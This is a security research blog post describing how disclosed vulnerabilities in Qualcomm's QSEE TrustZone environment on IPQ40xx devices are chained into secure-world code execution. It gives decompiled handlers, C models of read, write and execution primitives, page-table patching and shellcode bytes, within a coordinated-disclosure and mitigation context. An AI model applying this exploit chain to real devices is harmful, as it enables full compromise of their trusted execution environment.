Qualcomm IPQ40xx: Achieving QSEE Code Execution

Monday, Jun 14, 2021

In this post we finally dive into our approach for exploiting the vulnerabilities we’ve identified in QSEE, Qualcomm’s Trusted Execution Environment (TEE), on Qualcomm IPQ40xx-based devices (see post #1 and post #2). This allowed us to achieve arbitrary code execution in the context of QSEE.

Interestingly, the exploitation approach described in this post can also be combined with the Electromagnetic Fault Injection (EMFI) attack we performed (see post #3). This allows achieving code execution in the absence of any software vulnerability.

Secure ranges

It’s the responsibility of QSEE to check that input/output buffers passed by the REE do not overlap with secure memory. As we described in post #2, this is done using secure range checks.

The secure range table and its entries may vary between devices, as it depends on the memory layout of the device. The secure range table for our target is shown below. It contains 10 entries of which three are configured and enabled.

                   ID        FLAGS        START        END    
LOAD:87EAB1E0 <0x00000000, 0x00000002, 0x00000000, 0x7FFFFFFF>
LOAD:87EAB1F0 <0x00000001, 0x00000002, 0x90000000, 0xFFFFFFFF>
LOAD:87EAB200 <0x00000002, 0x00000002, 0x87E80000, 0x87FFFFFF>
LOAD:87EAB210 <0x00000003, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB220 <0x00000004, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB230 <0x00000005, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB240 <0x00000006, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB250 <0x00000007, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB260 <0x00000008, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB270 <0x00000009, 0x00000001, 0x00000000, 0x00000000>
LOAD:87EAB280 <0xFFFFFFFF, 0x00000000, 0x00000000, 0x00000000>

The secure ranges span the entire 32-bit address space. With the above configuration, only the following non-secure memory ranges are defined: 0x80000000 - 0x87E80000 and 0x88000000 - 0x90000000. The rest is considered secure memory by the secure range check.
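To make the layout concrete, here is a minimal C sketch of the three enabled entries and a lookup that tells whether a single address falls in a secure range. The struct layout follows the columns of the table above. The names `addr_is_secure`, `SR_ENABLED` and `SR_END_ID` are ours, and treating END as inclusive is an assumption.

```c
#include <stdint.h>
#include <stddef.h>

/* Entry layout as shown in the table above: ID, FLAGS, START, END. */
typedef struct {
    uint32_t id, flags, start, end;
} secure_range;

#define SR_ENABLED 0x2u          /* bit 1 of FLAGS marks an enabled entry */
#define SR_END_ID  0xFFFFFFFFu   /* ID of the terminating entry */

/* The three enabled entries of our target, followed by the terminator. */
const secure_range sr_table[] = {
    { 0, SR_ENABLED, 0x00000000u, 0x7FFFFFFFu },
    { 1, SR_ENABLED, 0x90000000u, 0xFFFFFFFFu },
    { 2, SR_ENABLED, 0x87E80000u, 0x87FFFFFFu },
    { SR_END_ID, 0, 0, 0 },
};

/* Returns 1 if addr lies inside any enabled secure range, 0 otherwise.
   END is treated as inclusive here, which is an assumption. */
int addr_is_secure(const secure_range *tbl, uint32_t addr)
{
    for (size_t i = 0; tbl[i].id != SR_END_ID; i++) {
        if ((tbl[i].flags & SR_ENABLED) &&
            addr >= tbl[i].start && addr <= tbl[i].end)
            return 1;
    }
    return 0;
}
```

With this model, 0x80000000 and 0x88000000 are reported as non-secure, while 0x87E80000 and 0x90000000 are reported as secure.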

Other (hardware) TrustZone controllers (i.e. TZASC) ensure that the REE cannot access secure memory directly over the bus. The configuration of these controllers must be fully aligned with the defined secure ranges. Any discrepancy may allow the REE to access secure memory.

Open Sesame

The vulnerable SMC handler routines we identified were using the secure range check incorrectly (see post #2). This allows writing several restricted values (i.e. 0, 1 and 2) to an arbitrary address (incl. secure memory). While these are interesting primitives, they are not sufficient to achieve arbitrary code execution directly.

We raelized that the unused secure range entries have the FLAGS field set to 0x00000001. Interestingly, this field is checked by the secure range check function (i.e. is_allowed_range). If bit 1 is set to 0, the entry is actually skipped as is visible in the decompiled code shown below.

int is_allowed_range(uint32_t *sr_table, uint32_t *start_addr, uint32_t *end_addr)
{
    uint32_t *range_addr, range_start;
    secure_range *sec_range;

    if ( end_addr < start_addr )
        return 0;

    for ( int i = 0; ; ++i )                // iterate over all entries
    {
        sec_range = &sr_table[4 * i];       // get pointer to entry
        if ( sec_range->id == 0xFFFFFFFF )
            break;
        if ( !(sec_range->flags & 2) )      // check if range is enabled
            continue;                       // go to next entry

        range_addr = sec_range->end_addr;
        if ( !range_addr )
        {
            range_addr = sec_range->start_addr;
            if ( range_addr <= start_addr )
                return 0;
LABEL_10:
            if ( range_addr <= end_addr )
                return 0;

            continue;
        }

        // check range
        range_start = sec_range->start_addr;
        if ( range_start <= start_addr && range_addr > start_addr
          || range_start <= end_addr && range_addr > end_addr )
            return 0;

        if ( range_start > start_addr )
            goto LABEL_10;
    }
    return 1;                               // range is allowed
}
This means we are able to disable an entry in the secure range table if we are able to clear bit 1 of its flags field. As you likely raelize, we can use the restricted writes (i.e. CVE-2020-11256, CVE-2020-11258 and CVE-2020-11259) to do exactly that. For example, we can write 0x1 to the flags field of all the entries, as shown below.

...
LOAD:87EAB1E0 <0x00000000, 0x00000001, 0x00000000, 0x7FFFFFFF>
LOAD:87EAB1F0 <0x00000001, 0x00000001, 0x90000000, 0xFFFFFFFF>
LOAD:87EAB200 <0x00000002, 0x00000001, 0x87E80000, 0x87FFFFFF>
...

Once all secure ranges are disabled, the secure range checks performed by all the SMC handler routines will consider any physical address (incl. secure memory) to be allowed. This opens up a completely new attack surface, as the behavior of the other SMC handlers can now be used to our advantage.
Put differently, by removing the restrictions enforced by the secure range checks, we made all SMC handler routines vulnerable in much the same way as the software vulnerabilities we identified.
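The effect of overwriting the flags can be reproduced with a small host-side model. This is a sketch, not the QSEE implementation: `is_allowed_range_model` replaces the decompiled logic with a plain inclusive overlap test (an assumption), and `disable_all_ranges` stands in for the restricted writes of the value 1.

```c
#include <stdint.h>
#include <stddef.h>

typedef struct {
    uint32_t id, flags, start, end;
} secure_range;

/* Mutable copy of the enabled entries; the real table lives in writable memory. */
secure_range sr_table[] = {
    { 0, 0x2, 0x00000000u, 0x7FFFFFFFu },
    { 1, 0x2, 0x90000000u, 0xFFFFFFFFu },
    { 2, 0x2, 0x87E80000u, 0x87FFFFFFu },
    { 0xFFFFFFFFu, 0, 0, 0 },
};

/* Simplified model of the check: reject a buffer that overlaps any
   enabled entry. Entries without bit 1 set in FLAGS are skipped. */
int is_allowed_range_model(const secure_range *tbl, uint32_t start, uint32_t end)
{
    if (end < start)
        return 0;
    for (size_t i = 0; tbl[i].id != 0xFFFFFFFFu; i++) {
        if (!(tbl[i].flags & 0x2))
            continue;
        if (start <= tbl[i].end && end >= tbl[i].start)
            return 0;
    }
    return 1;
}

/* Models the restricted write of the value 1 to every FLAGS field. */
void disable_all_ranges(secure_range *tbl)
{
    for (size_t i = 0; tbl[i].id != 0xFFFFFFFFu; i++)
        tbl[i].flags = 0x1;
}
```

Before `disable_all_ranges` runs, a buffer at 0x87EAB1E0 (the table itself) is rejected. Afterwards every entry is skipped and the same buffer is accepted.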
Finding new primitives

After removing the restrictions enforced by the secure range checks, we were presented with a variety of possibilities. We immediately started foraging for more powerful Read, Write and Execution primitives. Better primitives should bring us closer to achieving arbitrary QSEE code execution.
Write primitive
The SMC handler routine tzbsp_pil_get_mem_area calls the get_mem_area function with arg2 as is shown below.
int tzbsp_pil_get_mem_area(int arg1, uint32_t *arg2, uint32_t arg3)
{
    if ( arg3 < 8 )
        return 0xFFFFFFF0;
    
    // this secure range check is disabled
    if ( is_non_sec_mem(arg2, 8) )
        return get_mem_area(arg2, arg2 + 1);

    return 0xFFFFFFEE;
}
The get_mem_area function writes 0x80000000 to the address provided by the REE in arg2 and 0xA0000000 to the word that follows it (arg2 + 1).
int get_mem_area(uint32_t *a1, uint32_t *a2) 
{
  *a1 = 0x80000000;
  *a2 = 0xA0000000;
  return 0;
}
The is_non_sec_mem function always returns 1 as all secure ranges are disabled. Therefore, we can write 0x80000000 and 0xA0000000 to any address (incl. secure memory). This adds two more values to our collection of restricted writes.
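One practical detail of this primitive is that it always writes two adjacent words. The following sketch models the handler on the host with the range check removed; `pil_get_mem_area_model` is our name, and the error code is written as the signed equivalent of 0xFFFFFFF0.

```c
#include <stdint.h>

/* Model of get_mem_area from the listing above: two fixed values,
   written to two adjacent 32-bit words. */
int get_mem_area(uint32_t *a1, uint32_t *a2)
{
    *a1 = 0x80000000u;
    *a2 = 0xA0000000u;
    return 0;
}

/* Model of the handler once the secure range check accepts everything. */
int pil_get_mem_area_model(uint32_t *arg2, uint32_t arg3)
{
    if (arg3 < 8)
        return -16;   /* 0xFFFFFFF0 as a signed 32-bit value */
    return get_mem_area(arg2, arg2 + 1);
}
```

To place 0x80000000 at a target word, the target address is passed as arg2, and the following word is overwritten with 0xA0000000 as a side effect.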
Read/Write primitive
The SMC handler routine tzbsp_get_diag copies the diagnostics information buffer to an address that’s provided by the REE. The source address (i.e. 0x87FDF000), which we named diag_info_buf_ptr, is actually a pointer stored in a writable location in secure memory.
int tzbsp_get_diag(uint8_t *addr, size_t size)
{
    if ( size < 0x1000 )
        return 0xFFFFFFEF;

    // this secure range check is disabled
    if ( addr > ~size || !is_allowed_range(sr_table, addr, &addr[size - 1]) )
        return 0xFFFFFFEE;
    
    // copy from diag_info_buf_ptr to dst_addr
    memcpy(addr, diag_info_buf_ptr, 0x1000u);
    tzbsp_dcache_clean_inval_region(addr, 0x1000);
    return 0;
}
We can write the contents of the diagnostics information buffer to any address as we control addr and the secure ranges are disabled.
We can use the previously described Write primitive to overwrite diag_info_buf_ptr with 0x80000000. As this address points to non-secure memory, we control the data stored at this address. This allows us to write arbitrary data to an arbitrary address.
Then, we can use this arbitrary Write primitive to overwrite diag_info_buf_ptr with an arbitrary value. As tzbsp_get_diag copies from that address to a buffer of our choice, this allows us to read from an arbitrary address.
The downside of this Read/Write primitive is that it always copies 0x1000 bytes. Another inconvenience is that we cannot read the initial value of diag_info_buf_ptr, as arbitrary reads are only possible after the Write primitive is obtained. This means we cannot restore the original value if needed.
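The way one handler yields both directions can be shown with a host-side model. This is only a sketch: `get_diag_model`, `write_4k` and `read_4k` are hypothetical names, ordinary C pointers stand in for physical addresses, and the assignment to `diag_info_buf_ptr` stands in for the overwrite performed with the Write primitives.

```c
#include <stdint.h>
#include <string.h>

#define DIAG_SIZE 0x1000u

/* Stand-in for the pointer QSEE keeps in writable secure memory. */
const uint8_t *diag_info_buf_ptr;

/* Model of tzbsp_get_diag with the secure range check already disabled. */
int get_diag_model(uint8_t *addr, size_t size)
{
    if (size < DIAG_SIZE)
        return -17;                        /* 0xFFFFFFEF in the listing above */
    memcpy(addr, diag_info_buf_ptr, DIAG_SIZE);
    return 0;
}

/* Arbitrary write: the source pointer refers to a buffer we control. */
int write_4k(uint8_t *dst, const uint8_t *controlled_src)
{
    diag_info_buf_ptr = controlled_src;    /* set through the restricted write */
    return get_diag_model(dst, DIAG_SIZE);
}

/* Arbitrary read: the source pointer refers to the memory we want to leak. */
int read_4k(uint8_t *ree_dst, const uint8_t *target)
{
    diag_info_buf_ptr = target;            /* set through the arbitrary write */
    return get_diag_model(ree_dst, DIAG_SIZE);
}
```

Both directions move a full 0x1000-byte block, which is the limitation described above.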
Execution primitive
The SMC handler routine tzbsp_exec_smc calls the function exec_smc_wrapper with arguments passed by the REE as is shown below.
int tzbsp_exec_smc(unsigned int addr1, unsigned int addr2, int size2)
{
    if ( addr2 >= addr1 )
    {
        exec_smc_wrapper(addr1, addr2 - addr1 - 0xC, addr2, size2);
        JUMPOUT(locret_87E88636);
    }
    return 0xFFFFFFF0;
}
The exec_smc_wrapper function calls exec_smc with the arguments received from the REE. Note, not all arguments are fully under REE control as size1 is computed (i.e. addr2 - addr1 - 0xC).
int exec_smc_wrapper(int addr1, int size1, int addr2, int size2)
{
  return exec_smc(addr1, size1, addr2, size2, 0);
}
The exec_smc function performs two checks on the arguments passed by the REE using is_non_sec_mem. Then, once all checks are passed, it retrieves a function pointer from a table in memory (smc_exec_func_ptr_tbl) and calls it with the arguments passed by the REE.
int exec_smc(int addr1, int size1, int addr2, int size2, int idx)
{
    void (__fastcall *smc_func_ptr)(int, int, int, int);

    // these secure range checks are disabled
    if ( !is_non_sec_mem(addr1, size1) || !is_non_sec_mem(addr2, size2) )
        return 0xFFFFFFEE;

    // retrieve function pointer from secure memory
    smc_func_ptr = smc_exec_func_ptr_tbl[5 * idx];

    // if function pointer is not zero, call the function pointer
    if ( smc_func_ptr )
        smc_func_ptr(addr1, size1, addr2, size2);
    
    return 0;
}
The function pointer is stored in a writable location in secure memory and therefore we can overwrite it with an arbitrary value using our Read/Write primitive. This allows us to make the processor execute code from any address.
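A small model helps to see which arguments reach the hijacked pointer. In this sketch, `exec_smc_model` collapses tzbsp_exec_smc, exec_smc_wrapper and exec_smc into one function with the range checks removed, and `record_args` is a hypothetical target that records what it receives. All arguments are modelled as uint32_t for simplicity.

```c
#include <stdint.h>
#include <stddef.h>

typedef void (*smc_func)(uint32_t, uint32_t, uint32_t, uint32_t);

/* Stand-in for smc_exec_func_ptr_tbl; the handler only uses slot 5 * 0. */
smc_func smc_exec_func_ptr_tbl[5];

/* Records the arguments the hijacked pointer is called with (r0..r3). */
uint32_t seen_args[4];

void record_args(uint32_t r0, uint32_t r1, uint32_t r2, uint32_t r3)
{
    seen_args[0] = r0;
    seen_args[1] = r1;
    seen_args[2] = r2;
    seen_args[3] = r3;
}

/* Model of tzbsp_exec_smc -> exec_smc with the range checks disabled. */
int exec_smc_model(uint32_t addr1, uint32_t addr2, uint32_t size2)
{
    if (addr2 < addr1)
        return -16;                        /* 0xFFFFFFF0 in the listing above */
    smc_func f = smc_exec_func_ptr_tbl[5 * 0];
    if (f != NULL)
        f(addr1, addr2 - addr1 - 0xCu, addr2, size2);
    return 0;
}
```

After storing `record_args` in slot 0, a call with addr1 = 0x1000, addr2 = 0x2000 and size2 = 0x20 reaches the target with r0 = 0x1000, r1 = 0xFF4, r2 = 0x2000 and r3 = 0x20. Only r1 is computed rather than chosen directly.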
Returning-to-QSEE

We have many ingredients: we can read from anywhere, write to anywhere and make the processor jump to any location. Let’s start cooking. As a first step, we decided to use our newly acquired primitives to return to the QSEE software itself.
Jumping anywhere
Our goal is to overwrite the function pointer used by tzbsp_exec_smc with an arbitrary value. We accomplished this by combining multiple primitives together.

1. Call tzbsp_pil_get_mem_area to overwrite tzbsp_get_diag’s source pointer with 0x80000000, which is non-secure memory.
2. From the REE, write the target pointer we want executed to address 0x80000000.
3. Call tzbsp_get_diag to overwrite the function pointer table used by tzbsp_exec_smc with the target pointer.
4. Call tzbsp_exec_smc to jump to any address within the QSEE software.

Whoop Whoop! Well, let’s not celebrate too soon. We can only reuse QSEE code that’s already present inside the device. We can call e.g. specific functions or gadgets. Quite interesting, but not exactly arbitrary code execution.
Improved Read/Write primitive
Nonetheless, let’s use it for something useful. The Read/Write primitive described earlier in this post is not optimal as it always copies 0x1000 bytes and its source pointer must be adjusted constantly. Therefore, we decided to use our newly acquired return-to-QSEE capabilities to create a RW-primitive that we fully control.
We identified the presence of a hardened memcpy implementation which we named secure_memcpy. As is common practice, it’s actually a wrapper around an actual memcpy function as is shown below.
uint32_t secure_memcpy(int dst, uint32_t dst_size, int src, uint32_t src_size)
{
  if ( dst_size > src_size )
    dst_size = src_size;
  else
    dst_size = dst_size;
  
  memcpy(dst, src, dst_size);
  return dst_size;
}
Why is this useful? Well, we can use our return-to-QSEE capabilities to call any function, including the secure_memcpy function. Ideally, we would call the memcpy function directly, but we do not control all arguments. We actually only control r0, r2 and r3. Luckily, the secure_memcpy function uses exactly these arguments as arguments for calling the memcpy function. This allows us to leverage the secure_memcpy function to call the memcpy function with arbitrary arguments in order to create a very efficient Read/Write primitive.
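Because r1 is computed as addr2 - addr1 - 0xC, the number of bytes that secure_memcpy ends up copying depends on how far apart source and destination are. The sketch below derives that length from the listings above. The helper names are ours, and the 32-bit wrap-around behavior is an assumption based on the uint32_t types in the decompiled code.

```c
#include <stdint.h>

/* Length memcpy receives when tzbsp_exec_smc is redirected to secure_memcpy:
   r0 = dst (addr1), r2 = src (addr2), r3 = src_size (size2),
   r1 = dst_size, computed as addr2 - addr1 - 0xC. */
uint32_t effective_copy_len(uint32_t dst, uint32_t src, uint32_t size2)
{
    uint32_t dst_size = src - dst - 0xCu;   /* wraps modulo 2^32 */
    return dst_size > size2 ? size2 : dst_size;
}

/* tzbsp_exec_smc only proceeds when addr2 >= addr1, i.e. src >= dst. */
int call_is_accepted(uint32_t dst, uint32_t src)
{
    return src >= dst;
}
```

Under these assumptions, copying 0x4000 bytes from 0x87EDC000 to 0x80000000 is accepted and copies the full 0x4000 bytes, as the distance between the two buffers is much larger than size2. A write to secure memory needs a source at a higher address than the destination, for example in the non-secure range starting at 0x88000000.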
Executing shellcode

The classical approach would be to write shellcode to QSEE memory, ensure the memory is also executable and then trigger execution. But we actually prefer a slightly more effective approach that works in many real cases: store the shellcode in non-secure memory that we already control and have QSEE execute it from there. This makes shaping our payloads very easy.
We tried this strategy, but we quickly figured out that something prevented our shellcode from executing. The MMU is actually correctly configured to prevent the processor from executing from non-secure pages when it’s in the secure state (i.e. the XN-bit is correctly used). Therefore, we needed to circumvent the limitations of the MMU in order to achieve arbitrary code execution.
Patching the MMU configuration
The Translation Table Base Register 0 (TTBR0) stores the base address of the L1 translation table. The size of this primary page table is 16 KB and its base is set to 0x87EDC000 for the device we are analyzing. We recovered this address by reverse engineering the QSEE initialization routines.
...                                                   
LOAD:87E8B520 90 00 9F E5   LDR    R0, =dword_87EDC000
LOAD:87E8B524 D9 E2 FF EB   BL     set_TTBR0
...                                                   
We used our arbitrary Read/Write primitive to dump the entire L1 translation table. This table includes 4096 entries of 4 bytes that describe the entire 32-bit virtual address space in 1 MB chunks. Each entry can be set as Invalid, Page table, Section, Supersection or Reserved.
For the device we analyzed, the L1 translation table only included Section and Page table entries. A Section entry covers an entire 1 MB region. A Page table entry points to an L2 translation table that includes 256 entries to cover the 1 MB region in 4 KB chunks. The entire virtual address space is mapped to the physical address space using a 1-to-1 mapping. Several entries are shown in the snippet below.

...                                                            
0x87edc000:     01 a0 eb 87 01 a4 eb 87 16 04 21 00 16 04 31 00
0x87edc010:     16 04 41 00 16 04 51 00 16 04 61 00 16 04 71 00
...                                                            
0x87edffe0:     16 04 81 ff 16 04 91 ff 16 04 a1 ff 16 04 b1 ff
0x87edfff0:     16 04 c1 ff 16 04 d1 ff 16 04 e1 ff 16 04 f1 ff
...                                                            

As the page tables are not easily digested by the human brain, we wrote a translation table parser in order to make sense out of the MMU configuration. The non-secure memory is configured using Section entries in the L1 page table for which the format is shown in the picture below.

[Figure: format of a Section entry in the L1 translation table]

A representation of the Section entry for address 0x82000000 (i.e. non-secure memory) obtained from our parser is shown below. It shows the 1-to-1 mapping and the configuration bits that are set for that 1 MB chunk of memory.

VA[0x82000000] --> PA[0x82000000] Domain: 0 NS: 0 AP: 001 XN: 1 PXN: 0
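A parser for Section entries only needs a handful of shifts and masks. The sketch below is not our actual parser. It decodes the fields printed above using the ARMv7 short-descriptor layout, and it assumes the core implements PXN in bit 0. The `section_entry` type and `decode_section` name are illustrative.

```c
#include <stdint.h>

/* Fields of an ARMv7 short-descriptor Section entry. */
typedef struct {
    uint32_t pa_base;   /* bits [31:20], physical base of the 1 MB region */
    unsigned ns;        /* bit 19 */
    unsigned ap;        /* AP[2] (bit 15) followed by AP[1:0] (bits [11:10]) */
    unsigned domain;    /* bits [8:5] */
    unsigned xn;        /* bit 4 */
    unsigned pxn;       /* bit 0, assuming PXN is implemented */
} section_entry;

/* Returns 1 and fills *out if desc is a Section entry, 0 otherwise. */
int decode_section(uint32_t desc, section_entry *out)
{
    /* Bit 1 set selects Section/Supersection; bit 18 set means Supersection. */
    if (!(desc & 0x2u) || (desc & (1u << 18)))
        return 0;

    out->pa_base = desc & 0xFFF00000u;
    out->ns      = (desc >> 19) & 1u;
    out->ap      = (((desc >> 15) & 1u) << 2) | ((desc >> 10) & 3u);
    out->domain  = (desc >> 5) & 0xFu;
    out->xn      = (desc >> 4) & 1u;
    out->pxn     = desc & 1u;
    return 1;
}
```

Decoding the third entry of the dump (bytes 16 04 21 00, i.e. 0x00210416) gives PA 0x00200000, Domain 0, NS 0, AP 001, XN 1 and PXN 0. The first entry (0x87EBA001) is a Page table entry and is rejected.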

The XN-bit (i.e. bit 4) is set to 1, which means an exception will be raised by the MMU if the processor tries to execute from that chunk of memory. The entire non-secure memory range has the XN-bit set in the QSEE MMU configuration. This is THE reason we cannot execute from non-secure memory.
We decided to set the XN-bit to 0 in the Section entry of the L1 translation table for address 0x82000000 using our arbitrary Read/Write primitive. This allows us to store a shellcode in non-secure memory and execute it with QSEE privileges using our execution primitive.

Old: VA[0x82000000]: Section ----> PA[0x82000000] Domain: 0 NS: 0 AP: 001 XN: 1 PXN: 0
New: VA[0x82000000]: Section ----> PA[0x82000000] Domain: 0 NS: 0 AP: 001 XN: 0 PXN: 0
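Locating and patching the entry comes down to simple arithmetic. The sketch below assumes the 16 KB L1 table at 0x87EDC000 with one 4-byte entry per 1 MB of virtual address space, as described above. The helper names are ours.

```c
#include <stdint.h>

#define L1_TABLE_BASE 0x87EDC000u   /* TTBR0 base recovered from the init code */
#define SECTION_XN    (1u << 4)     /* XN-bit of a Section entry */

/* Address of the 4-byte L1 entry describing the 1 MB region that contains va. */
uint32_t l1_entry_addr(uint32_t va)
{
    return L1_TABLE_BASE + (va >> 20) * 4u;
}

/* Returns the descriptor with the XN-bit cleared; all other bits are kept. */
uint32_t clear_xn(uint32_t desc)
{
    return desc & ~SECTION_XN;
}
```

For VA 0x82000000 the index is 0x820, so the entry sits at 0x87EDC000 + 0x820 * 4 = 0x87EDE080. Applied to a descriptor from the dump, such as 0x00210416, clearing the XN-bit yields 0x00210406.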

Executing the shellcode
The shellcode, which we store at address 0x82000000 (non-secure memory), reads the Secure Configuration Register (SCR), which contains the NS-bit. If the NS-bit reads as 0, the code is executing with QSEE privileges. This allows us to determine whether the exploit works as expected.
0x00:  11 1F 11 EE    mrc p15, #0, r1, c1, c1, #0   // read SCR into R1
0x04:  00 10 80 E5    str r1, [r0]                  // store R1 at [R0]
0x08:  1E FF 2F E1    bx  lr                        // return
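On the REE side, the shellcode can be kept as a byte array and the value it stores can be checked with a one-line helper. This is a sketch with illustrative names. It relies on r0 being the first argument passed to the hijacked function pointer, so the SCR value is stored at the address supplied as addr1.

```c
#include <stdint.h>

/* The three ARM instructions from the listing above, in memory order. */
const uint8_t shellcode[] = {
    0x11, 0x1F, 0x11, 0xEE,   /* mrc p15, #0, r1, c1, c1, #0 : read SCR into r1 */
    0x00, 0x10, 0x80, 0xE5,   /* str r1, [r0]                : store r1 at [r0] */
    0x1E, 0xFF, 0x2F, 0xE1,   /* bx  lr                      : return */
};

/* The NS-bit is bit 0 of SCR; 0 means the core was in the secure state. */
int ran_in_secure_state(uint32_t scr)
{
    return (scr & 1u) == 0;
}
```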
We take the following steps to execute the shellcode:

1. Store shellcode at 0x82000000 in non-secure memory
2. Disable the secure ranges using CVE-2020-11256
3. Create our Read/Write primitive using the secure_memcpy function
4. Use this primitive to patch the L1 translation table entry for 0x82000000
5. Jump to 0x82000000 using our execution primitive to achieve arbitrary code execution

The video below demonstrates the complete exploit.





Note, disabling the secure ranges can also be accomplished using the hardware EMFI attack that we described in post #3. This shows that software exploitation knowledge can be reused efficiently for fault injection attacks. Put differently, exploits developed for software vulnerabilities that have since been fixed can be reused.
Conclusion

The vulnerabilities we identified in QSEE allowed us to write several restricted values to secure memory. This enabled us to disable the secure range checks in order to open up a larger attack surface that we used to achieve arbitrary code execution.
This reminds us of an old adage that any secure system is really only as strong as its weakest link. If the software is vulnerable, the ARM TrustZone hardware primitives provide little protection. Moreover, the enforcement of the security boundary between the REE and QSEE is for a significant part implemented in software.
It’s worth noting that the use of secure range checks is not uncommon. Actually, any privileged subsystem receiving arguments (i.e. pointers) from a non-trusted subsystem must implement some form of sanitization in line with the current secure memory layout. Therefore, the exploitation strategy that we used may be applicable to other TEEs as well.
The ability to reconfigure the QSEE subsystem provides ample opportunities to an attacker. As demonstrated in this research, a restricted write due to a software vulnerability may compromise the entire QSEE subsystem.
Locking the configuration until the next reset would obviously address this issue. However, this is only possible for long-lived configuration options that do not need any changes at runtime. For example, most devices dynamically reuse memory as secure and non-secure for implementing various use cases efficiently. Therefore, several configurations simply cannot be fully locked.
Interesting solutions include verifying the integrity of the configured secure range tables. For our approach, a simple checksum would have likely been sufficient to prevent the modification of the secure range table, as we only had the ability to write restricted values.
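As an illustration of such an integrity check, the sketch below hashes the table with 32-bit FNV-1a and compares the result against a reference value recorded when the table was configured. This is our own example, not something QSEE implements. The function names are hypothetical and the reference value is assumed to be kept somewhere an attacker cannot set to a matching value.

```c
#include <stdint.h>
#include <stddef.h>

typedef struct {
    uint32_t id, flags, start, end;
} secure_range;

/* Feeds one 32-bit word into a running FNV-1a hash, least significant byte first. */
static uint32_t fnv1a_word(uint32_t h, uint32_t w)
{
    for (int i = 0; i < 4; i++) {
        h ^= (w >> (8 * i)) & 0xFFu;
        h *= 16777619u;               /* 32-bit FNV prime */
    }
    return h;
}

/* Hash over all entries up to (not including) the terminator. */
uint32_t sr_table_hash(const secure_range *tbl)
{
    uint32_t h = 2166136261u;         /* 32-bit FNV offset basis */
    for (size_t i = 0; tbl[i].id != 0xFFFFFFFFu; i++) {
        h = fnv1a_word(h, tbl[i].id);
        h = fnv1a_word(h, tbl[i].flags);
        h = fnv1a_word(h, tbl[i].start);
        h = fnv1a_word(h, tbl[i].end);
    }
    return h;
}

/* Returns 1 if the table still matches the recorded reference value. */
int sr_table_intact(const secure_range *tbl, uint32_t reference)
{
    return sr_table_hash(tbl) == reference;
}
```

A range check that calls `sr_table_intact` first would notice a flags field changed from 0x2 to 0x1, because the hash no longer matches the reference.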
Final words

This post concludes our research on QSEE, Qualcomm’s Trusted Execution Environment (TEE), on Qualcomm IPQ40xx-based devices. We would like to thank Qualcomm for professionally handling the disclosure and for their attitude towards us as security researchers.
- Raelize.